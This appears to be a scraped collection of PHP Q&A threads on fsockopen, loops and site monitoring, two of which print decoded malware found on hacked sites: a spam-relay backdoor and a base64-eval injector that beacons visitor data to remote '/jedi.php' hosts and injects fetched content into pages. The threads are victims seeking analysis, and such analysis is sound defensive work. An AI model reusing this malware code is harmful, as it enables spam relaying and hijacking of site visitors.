PHP Infine Loop Problem - php

function httpGet( $url, $followRedirects=true ) {
global $final_url;
$url_parsed = parse_url($url);
if ( empty($url_parsed['scheme']) ) {
$url_parsed = parse_url('http://'.$url);
$final_url = $url_parsed;
$port = $url_parsed["port"];
if ( !$port ) {
$port = 80;
$rtn['url']['port'] = $port;
$path = $url_parsed["path"];
if ( empty($path) ) {
if ( !empty($url_parsed["query"]) ) {
$path .= "?".$url_parsed["query"];
$rtn['url']['path'] = $path;
$host = $url_parsed["host"];
$foundBody = false;
$out = "GET $path HTTP/1.0\r\n";
$out .= "Host: $host\r\n";
$out .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
$out .= "Connection: Close\r\n\r\n";
if ( !$fp = #fsockopen($host, $port, $errno, $errstr, 30) ) {
$rtn['errornumber'] = $errno;
$rtn['errorstring'] = $errstr;
fwrite($fp, $out);
while (!#feof($fp)) {
$s = #fgets($fp, 128);
if ( $s == "\r\n" ) {
$foundBody = true;
if ( $foundBody ) {
$body .= $s;
} else {
if ( ($followRedirects) && (stristr($s, "location:") != false) ) {
$redirect = preg_replace("/location:/i", "", $s);
return httpGet( trim($redirect) );
$header .= $s;
This code sometimes go infinite loop. What's wrong here?

There is a big, red warning box in the feof() documentation:
If a connection opened by fsockopen() wasn't closed by the server, feof() will hang. To workaround this, see below example:
Example #1 Handling timeouts with feof()
function safe_feof($fp, &start = NULL) {
$start = microtime(true);
return feof($fp);
/* Assuming $fp is previously opened by fsockopen() */
$start = NULL;
$timeout = ini_get('default_socket_timeout');
while(!safe_feof($fp, $start) && (microtime(true) - $start) < $timeout)
/* Handle */
Also you should only write to or read from the file pointer, if it is valid (what you are not doing, you just set an error message):
This leads to the second big red warning box:
If the passed file pointer is not valid you may get an infinite loop, because feof() fails to return TRUE.
Better would be:
$result = '';
if ( !$fp = #fsockopen($host, $port, $errno, $errstr, 30) ) {
$rtn['errornumber'] = $errno;
$rtn['errorstring'] = $errstr;
else {
fwrite($fp, $out);
while (!#feof($fp)) {
$result = trim(body);
return $result;
A last remark: If you follow a redirect with
if ( ($followRedirects) && (stristr($s, "location:") != false) ) {
$redirect = preg_replace("/location:/i", "", $s);
return httpGet( trim($redirect) );
you never close the file pointer. I think better is:
if ( ($followRedirects) && (stristr($s, "location:") != false) ) {
$redirect = preg_replace("/location:/i", "", $s);
$result = httpGet( trim($redirect) );
// ...
return $result;

feof will return false if the connection is still open in a tcp/ip stream.

function httpGet( $url, $followRedirects=true ) {
return httpGet( trim($redirect) );
Nothing prevents you from fetching the same URL again and again.


PHP - Need help to understand injected code

I discovered a lot of requests to a fishy file in a plugin on my Wordpress site. There, I found a long string, a mapping function for each character used in the string, and an excecution of the decoded string. This is the code the decoder outputs, any help in understanding what it does would be great!
if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
if (isset($_POST["type"]) && $_POST["type"]=="1")
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
elseif (isset($_POST["type"]))
echo $_POST["type"];
function is_good_ip($ip)
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
if (strstr($ip, $good) != FALSE)
return TRUE;
return FALSE;
function type1_send()
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
foreach($_POST as $key => $post)
$_POST[$key] = stripcslashes($post);
$emails = #unserialize(base64_decode($_POST["emails"]));
$themes = #unserialize(base64_decode($_POST["themes"]));
$messages = #unserialize(base64_decode($_POST["messages"]));
$froms = #unserialize(base64_decode($_POST["froms"]));
$mailers = #unserialize(base64_decode($_POST["mailers"]));
$aliases = #unserialize(base64_decode($_POST["aliases"]));
$passes = #unserialize(base64_decode($_POST["passes"]));
$_SERVER['PHP_SELF'] = "/";
foreach($_FILES as $key => $file)
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
foreach ($emails as $fteil => $email)
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
if (strstr($from, "[CUSTOM]") == FALSE)
$from = from_host($from);
$from = str_replace("[CUSTOM]", "", $from);
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
function send_mail($from, $to, $subj, $text, $mailer)
$head = "";
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
if(count($_FILES) > 0)
foreach($_FILES as $file)
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
if(#mail($to, $subj, $zag, $head))
echo "SENDED";
echo "FAIL";
function alter_macros($content)
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
return $content;
function text_macros($content)
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
return $content;
function xnum_macros($content)
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
return $content;
function num_macros($content)
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
return $content;
function generate_word($length)
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
$string .= substr($chars, rand(1, $numChars) - 1, 1);
return $string;
function pass_macros($content, $passes)
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
function fteil_macros($content, $fteil)
return str_replace("[FTEIL]", $fteil, $content);
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
function from_host($content)
$host = preg_replace('/^(www|ftp)\./i','',#$_SERVER['HTTP_HOST']);
if (is_ip($host))
return $content;
$tokens = explode("#", $content);
$content = $tokens[0] . "#" . $host . ">";
return $content;
function error_404()
header("HTTP/1.1 404 Not Found");
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
function custom_http_request1($params)
if( ! is_array($params) )
$params = array(
'url' => $params,
'method' => 'GET'
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Приводим ссылку в правильный вид */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
if( ! isset($url['host']) && isset($url['path']) )
if( strpos($url['path'], '/') )
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
$url['host'] = $url['path'];
$url['path'] = '/';
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = #fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
/* Mozilla */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
if( isset($params['data']) && is_array($params['data']) )
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
#fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !#feof($fp) )
$res .= #fread($fp, 1024); /* читаем контент */
/* Проверка наличия загловков в контенте */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
/* заголовки уже считаны - корректируем контент */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
if( strpos($v, ':') )
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
$headers[strtoupper($k)] = $v;
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
$func = __FUNCTION__;
return #is_object($this) ? $this->$func($params) : $func($params);
if( $params['return']=='headers' ) return $headers;
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
Edit: Apparently, I am doing something wrong with my question (2 instant downvotes). If you could tell me what I am doing wrong, I will try to correct it/remove my question.
This is a fun one, while I haven't a lot of time right now to look over the code I can give you some generalizations of common injections and attacks on websites, in particular a CMS like WordPress. Although this as a part of a plugin, may just be a malicious plugin and not an injection attack, or it may be a flaw or exploit in the plugin being used.
Initial observation, the code comments in Russian stand out.
This code looks like it might be for a spam relay. Taking messages and trying to leverage whatever sendmail you have setup. That's just a high level guess right now.
Most attacks but not necessarily this one are generally geared and trying to deliver malware to visitors to the site, they usually use active-x or iframe tricks, I didn't see any of that here so it leads me to believe that #2 is more likely.
This may also be trying to index all the content of your site/server that it can, and then send it out to the attacker so that they can sift the data looking for important information like config files and passwords.
I will do a deeper dive into this code when i'm not at work :) because I love this stuff. In the meantime you'll probably get a better response from the security stack pages than stack overflow or like I mentioned in my comment, check with the the hackers of on this one. If this was an exploit, they might even be able to track down the author and the specific exploit. Generally code like this is used as part of a more generic tool that probes and attacks, a bot and is not the work of an actual person. You should also possibly share the name of the plugin, as it may be malicious or a known exploit may be published.
Either way, you need to perform a deep security screening on the site in question, and assume that you've been hacked, and take all the proper steps accordingly.
-- Edit --
This code block is interesting:
function is_good_ip($ip)
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
if (strstr($ip, $good) != FALSE)
return TRUE;
return FALSE;
One of those IP's resolve to Fort Huachuca Dod Network Information Center. I'm probably going to delete this answer now... (turns out this may not be an IP but a version number.. my paranoia got the best of me) - you should probably post this question here instead: to avoid more downvotes.

fopen on URL blocks script execution in PHP

I'm trying to open a non-blocking stream in PHP (5.3.2 & 5.4.4). I do the following:
$fp = fopen($url, 'r');
if ($fp === false)
return false;
print('stream opened'.PHP_EOL);
stream_set_blocking($fp, 0);
The url points to a php file:
<?php sleep(10); ?>
The problem is that fopen() seems to block before I am even able to setup the stream as non blocking. Indeed, the stream opened message is printed after 10 seconds and not directly.
When doing a fopen on a url, the HTTP headers are sent at that moment. Since no context has been defiened (and it is not possible to configure contexts with the non-blocking option), fopen waits for the http headers to be sent and blocks.
A workaround is to use fsockopen which only opens the tcp connecion and does nothing more. The drawback of this approach is that the HTTP request has to be created manually.
Here is an (optimizable) implementation that reads data from an url in a non blocking way.
function parse_http_url($url)
$parts = parse_url($url);
if ($parts === false) return false;
if (!isset($parts['scheme']))
$parts['scheme'] = 'http';
if ($parts['scheme'] !== 'http' && $parts['scheme'] !== 'https')
return false;
if (!isset($parts['port']))
$parts['port'] = ($parts['scheme'] === 'http') ? 80 : 443;
$parts['path'] = '/';
$parts['uri'] = $parts['path'];
if (!empty($parts['query']))
$parts['uri'] .= '?'.$parts['query'];
return $parts;
function url_get_contents($url, $options = null) {
if(!($url_parts = parse_http_url($url))) return false;
$timeout = intval(#$options['http']['timeout']);
if (!($fp = fsockopen($url_parts['host'], $url_parts['port'], $errno, $errstr, $timeout))) return false;
stream_set_blocking($fp, 0);
if($timeout > 0) {
stream_set_timeout($fp, $timeout);
$sleep_time = (($timeout * 1000000) / 100); # 1% of timeout in ms
$stop_time = microtime(true) + $timeout;
} else {
$sleep_time = 10000; # 10 ms
if (!isset($options['http']['method'])) $options['http']['method'] = 'GET';
if (!isset($options['http']['header'])) $options['http']['header'] = '';
$request = "{$options['http']['method']} {$url_parts['uri']} HTTP/1.1\r\n{$options['http']['header']}\r\n";
if (fwrite($fp, $request) === false) {
return false;
$content = '';
$buff_size = 4096;
do {
$rd = fread($fp, $buff_size);
if ($rd === false) {
return false;
$content .= $rd;
$meta = stream_get_meta_data($fp);
if ($meta['eof']) {
if(empty($content)) return false;
// HTTP headers should be separated with \r\n only but lets be safe
$content = preg_split('/\r\n|\r|\n/', $content);
$resp = explode(' ', array_shift($content));
$code = isset($resp[1]) ? intval($resp[1]) : 0;
if ($code < 200 || $code >= 300) {
$message = isset($resp[2]) ? $resp[2] : 'Unknown error';
trigger_error("Error {$code} {$message}", E_USER_WARNING);
return false;
// Skip headers
while (!empty($content) && array_shift($content) !== '');
return implode("\n", $content);
if ($meta['timed_out']) {
return false;
if (isset($stop_time) && microtime(true) >= $stop_time) {
return false;
if ($meta['unread_bytes'] === 0) {
} while(true);

Found this very strange PHP code in one of my class files. What is it?

I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
I have no idea what it is and it's impossible to decipher. Nothing is output when you access the file directly online. Any ideas? Does it seem malicious?
If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,
Clean all your files.
Switch to secure FTP access immediately
Do some more research on internet about this attack and see what other actions you need to take.
You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.
You most certainly got hacked.
I did the fun to poke into the code.
The code is base64_encoded multiple times and then eval'd. Result is:
if (!function_exists("GetMama")){
function mod_con($buf){
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;}
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}
return $buf;}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
$contents = gzencode($contents);}
else {
$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
function GetMama(){
$mother = "";
return $mother;}
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];} else {
$host = "";}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];} else {
$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);}
else {
$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
else {
$ua = "";}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);}
else {$qs = "";}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;}
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);}
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);
return true;}
else {
return false;}}
$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";$father2[] = "";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
Yes it is malicious code, its a bunch of base64 encoded stings evaled, and the resulting code is:
if (!function_exists("GetMama")){
function mod_con($buf){
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}return $buf;}function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
$contents = gzencode($contents);
} else {$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
function GetMama(){
$mother = "";
return $mother;}ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
$ua = "";
}if (
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";}
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;}}
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
To expand on my comment...
Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...
If you wrote the site from scratch, look down.
Are you the only developer?
(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.
(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.
As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.
Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.
The code is:
if (!function_exists("GetMama"))
function mod_con($buf){
if ($cnt_h == 1) {
$buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf);
return $buf;
if ($cnt_h == 1) {
$buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
return $buf;
return $buf;
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
$contents = gzencode($contents);
else {
$contents = mod_con($buf);
$len = strlen($contents);
header("Content-Length: ".$len);
function GetMama(){
$mother = "";
return $mother;
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(FILE);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
if (isset($_SERVER["REMOTE_ADDR"])){
else {
$ip = "";
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
else {
$ref = "";
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
else {
$ua = "";
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
else {
$qs = "";
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); e
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
else {
return false;
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
$father2[] = "";
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
Unpacked by hand so its more readable :)

Adding an Array to a php script

I have a script that checks a website ($host) for an string of characters ($find). If the string exists the nothing happens, if the string is not found then an email is sent to a pre-set email address.
The problem I have is that I need to have an array of URL's and I believe a second array of text. The text in the array needs to match up to the URL's in the array.
Perhaps storing the URL's and text in a text file(s) might be a better solution.
Here is the script as it is right now, working on the single domain.
$host = '';
$find = 'content on my page';
function check($host, $find) {
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "$errstr ($errno)\n";
} else {
$header = "GET / HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp, $header);
while (!feof($fp)) {
$str.= fgets($fp, 1024);
return (strpos($str, $find) !== false);
function alert($host) {
mail('', 'Monitoring', $host.' down');
if (!check($host, $find)) alert($host);
New code with array in place:
$hostMap = array(
'' => 'content on site',
'' => 'content on second site',
foreach ($hostMap as $host => $find)
function check($host, $find)
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp)
echo "$errstr ($errno)\n";
} else {
$header = "GET / HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp, $header);
while (!feof($fp)) {
$str.= fgets($fp, 1024);
return (strpos($str, $find) !== false);
function alert($host)
mail('', 'Website Monitoring', $host.' is down');
print $host;
print $find;
//if (!check($host, $find)) alert($host);
if( !check( $host, $find ) )
Moved the functions outside of the foreach(
ini_set( 'display_errors', true );
$hostMap = array(
'' => 'content on site',
'' => 'content on second site',
function check($host, $find)
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp)
echo "$errstr ($errno)\n";
} else {
$header = "GET / HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp, $header);
while (!feof($fp)) {
$str.= fgets($fp, 1024);
return (strpos($str, $find) !== false);
function alert($host)
mail('', 'Website Monitoring', $host.' is down');
print $host;
print $find;
//if (!check($host, $find)) alert($host);
foreach ($hostMap as $host => $find)
if( !check( $host, $find ) )
Here is the final code with a working Array in case anyone else wants a solution like this.
function check($host, $find)
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp)
echo "$errstr ($errno)\n";
} else {
$header = "GET / HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp, $header);
while (!feof($fp)) {
$str.= fgets($fp, 1024);
return (strpos($str, $find) !== false);
function alert($host)
$headers = 'From: Set your from address here';
mail('', 'Website Monitoring', $host.' is down' $headers);
$hostMap = array(
'' => 'content on site',
'' => 'content on second site',
//if (!check($host, $find)) alert($host);
foreach ($hostMap as $host => $find)
if( !check( $host, $find ) )
$hostMap = array(
'' => 'content on my page',
/* etc. */
foreach( $hostMap as $host => $find )
if( !check( $host, $find ) )
However, be aware that -- depending on the amount of domains you are checking -- sequentially mailing large amounts of mails with PHP's native mail() is not very efficient. You may wanna look in to more specialized mail libraries for that, such as SwiftMailer.
